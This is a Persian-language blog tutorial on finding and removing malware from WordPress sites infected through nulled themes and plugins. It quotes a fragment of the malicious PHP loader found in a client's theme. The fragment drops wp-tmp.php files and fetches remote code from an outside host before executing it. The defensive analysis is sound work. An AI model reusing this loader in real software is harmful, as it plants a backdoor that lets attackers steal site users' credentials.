ویروس کشی وب سایت (Malware)

خانه » آموزش » ویروس کشی وب سایت (Malware)
زمان : ۱۲ خرد ۱۳۹۸ دسته بندی : آموزش, اخبار
رای دادن به نوشته

ویروس کشی وب سایت وردپرس و ازبین بردن Malware | حذف بدافزار سایت | امنیت وب سایت

بالا بردن امنیت وب سایت های وردپرسی ، آموزش ویروس یابی وب سایت، دزدیدن اطلاعات مشتریان وب سایت وردپرس ، جلوگیری از هک شدن وب سایت وردپرس

Malware :

Malwareیا بدافزار در اصل قطعه کدهایی هستند که توسط برنامه نویسان نوشته میشوند تا بوسیله آن بدون اجازه مالک سیستم، آن را آلوده و اقدام به کارهای ناخواسته یا خرابکارانه کنند. این واژه به صورت عمومی به تمامی کدها و برنامه های مخرب اطلاق میشود و به طور کلی هر نوع کدی که روی سیستم شما قرار بگیرد و عملیاتی ناخواسته را انجام دهد به عنوان بدافزار شناخته میشود، Malware میتواند گوشی تلفن، تبلت و کامپیوترها را آلوده کند.

اینبار Malware در وب سایت ها :

بسیاری از طراحان ممکن است از قالب های آماده وب سایت و یا افزونه یا پلاگین های رایگان و یا Null شده یا به اصطلاح کرک شده استفاده نمایند، این موضوع ممکن است راحت ویا به صرفه برای طراح باشد و قطعا در برخی موارد اینگونه است ولی مشکل از آنجایی شروع می شود که تعدادی از قالب و افزونه های نال شده پس از نصب مشکلی ایجاد نمی کنند و به راحتی استفاده می شوند و اعتماد طراح را جلب می نمایند ولی بعد از گذشت مدتی طولانی به طور مثال حتی 3 الی 6 ماه از کارکرد عادی و عالی افزونه ویا قالب، به طور کاملا هوشمندانه و نامحسوس این افزونه ها که از قبل درگاه هایی برای نفوذ درخود داشته اند کدهای مخربی وارد قسمت های کاربردی وب سایت می کنند از جمله باز کردن پاپ آپ به عنوان بازدید از سایت های مدنظرشون که این موضوع باعث نارضایتی مشتریان وب سایت شده و به تدریج از بازدید آنها از وب سایت کم شده ولی موضوع مهمتر این کدها در برخی موارد خود را در قسمت یوزر و پسورد وب سایتها قرار میدهند و شروع به دزدیدن اطلاعات کاربران می کنند.

ابزار بررسی ویروسی شدن وب سایت :

استفاده از وب سایت https://sitecheck.sucuri.net جهت اطمینان از ویروسی بودن وب سایت، درصورت ویروسی بودن به صورت ذیل نمایش داده می شود :

ابزار بررسی ویروسی شدن وب سایت :

بررسی کد های مخرب وب سایت

ابزار بررسی ویروسی شدن وب سایت :

کد مخرب در قسمت بازیابی رمز عبور کاربران قرار گرفته است و از آن طریق اطلاعات کاربران را به طور نامحسوس دریافت می کند.

حالا باید متوجه شوید کجای وب سایت این کدها قرار گرفته اند :

می توانید با استفاده از افزونه های انتی ویروس شروع به اسکن نمایید برخی انتی ویروسان فایل ها را پیداکرده و به راحتی کدهای مخرب را ازبین می برید، درصورتی که اسکن ناموفق بود خودتان فایل هایی را بگردید که تاریخ تغییرات فایل تازه باشد به این صورت به فایل مورد نظر می رسید و کدها را ازبین میبرید فقط توجه داشته باشین فقط فقط کدهای مخرب را پاک کنیدتا آسیبی به وب سایت شما نرسد، سپس بگردید کدام افزونه این کدمخرب را به سورس های اصلی تزریق کرده است و آن ها را حذف نمایید ویا با نسخه اورجینال آن تعویض نماییدتا تزریقات ادامه دار نباشد و مرحله بعدی آن فایلی که تزریق صورت گرفته بود را دسترسی فقط خواندنی به آن بدهید به عنوان مثال دسترسی 400 به آن بدهید.

نمونه آخرین کد کشف شده از سایت مشتریان در قسمت ذیل قرار داشت و با موفقیت ازبین رفت :

public_html/shop.******.com/wp-content/themes/*****/function.php

قسمتی از قطعه کد مخرب :

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent);
if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) {
@file_put_contents(get_template_directory() . ‘/wp-tmp.php’, $tmpcontent);
if (!file_exists(get_template_directory() . ‘/wp-tmp.php’)) {
@file_put_contents(‘wp-tmp.php’, $tmpcontent);
}
}
}
} elseif ($tmpcontent = @file_get_contents(ABSPATH . ‘wp-includes/wp-tmp.php’) AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents(get_template_directory() . ‘/wp-tmp.php’) AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents(‘wp-tmp.php’)
AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif (($tmpcontent =
@file_get_contents(“http://www.fonjy.top/
code.php”) OR $tmpcontent = @file_get_contents_tcurl(”
http://www.fonjy.top/code.php”)) AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
}
}

قطعه کد بالا حتی فایل های ذیل را هم ایجاد ویا تغییر داده است که باید اصلاح شود :

public_html/*********/wp-includes/

wp-vcd.php

wp-tmp.php

wp-feed.php

wp-diff.php

wp-cron.php

ودرپایان مجدد از طریق سایت https://sitecheck.sucuri.net اسکن می کنیم وخود سایت راهم چک میکنیم که مشکلش برطرف شده باشد.

ویروس کشی وب سایت وردپرس و ازبین بردن Malware | حذف بدافزار سایت

مجموعه NovinICT :

دوستان عزیز و همکاران گرامی امیدواریم در زمان استفاده از افزونه و قالب های نال شده وردپرس و یا دیگر CMS ها دقت کافی کرده و سعی کنید از سایت های معتبر تهیه نمایید.

کلمات کلیدی :

آموزش ویروس یابی وب سایت و ازبین بردن ویروس و بدافزار های احتمالی وب سایت وردپرس ، دزدیدن اطلاعات مشتریان وب سایت وردپرس ، ویروس کشی وب سایت وردپرس و ازبین بردن Malware ، حذف بدافزار سایت ، امنیت وب سایت ، انتی ویروس وردپرس ، هک شدن سایت وردپرس ، جلوگیری از هک شدن وب سایت وردپرس ، بالا بردن امنیت وب سایت های وردپرسی ، دزدیدن اطلاعات مشتریان وب سایت وردپرس

 

دیدگاه ها

پاسخ دادن به ناشناس لغو پاسخ

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

افزایش بازدید گوگل رایگان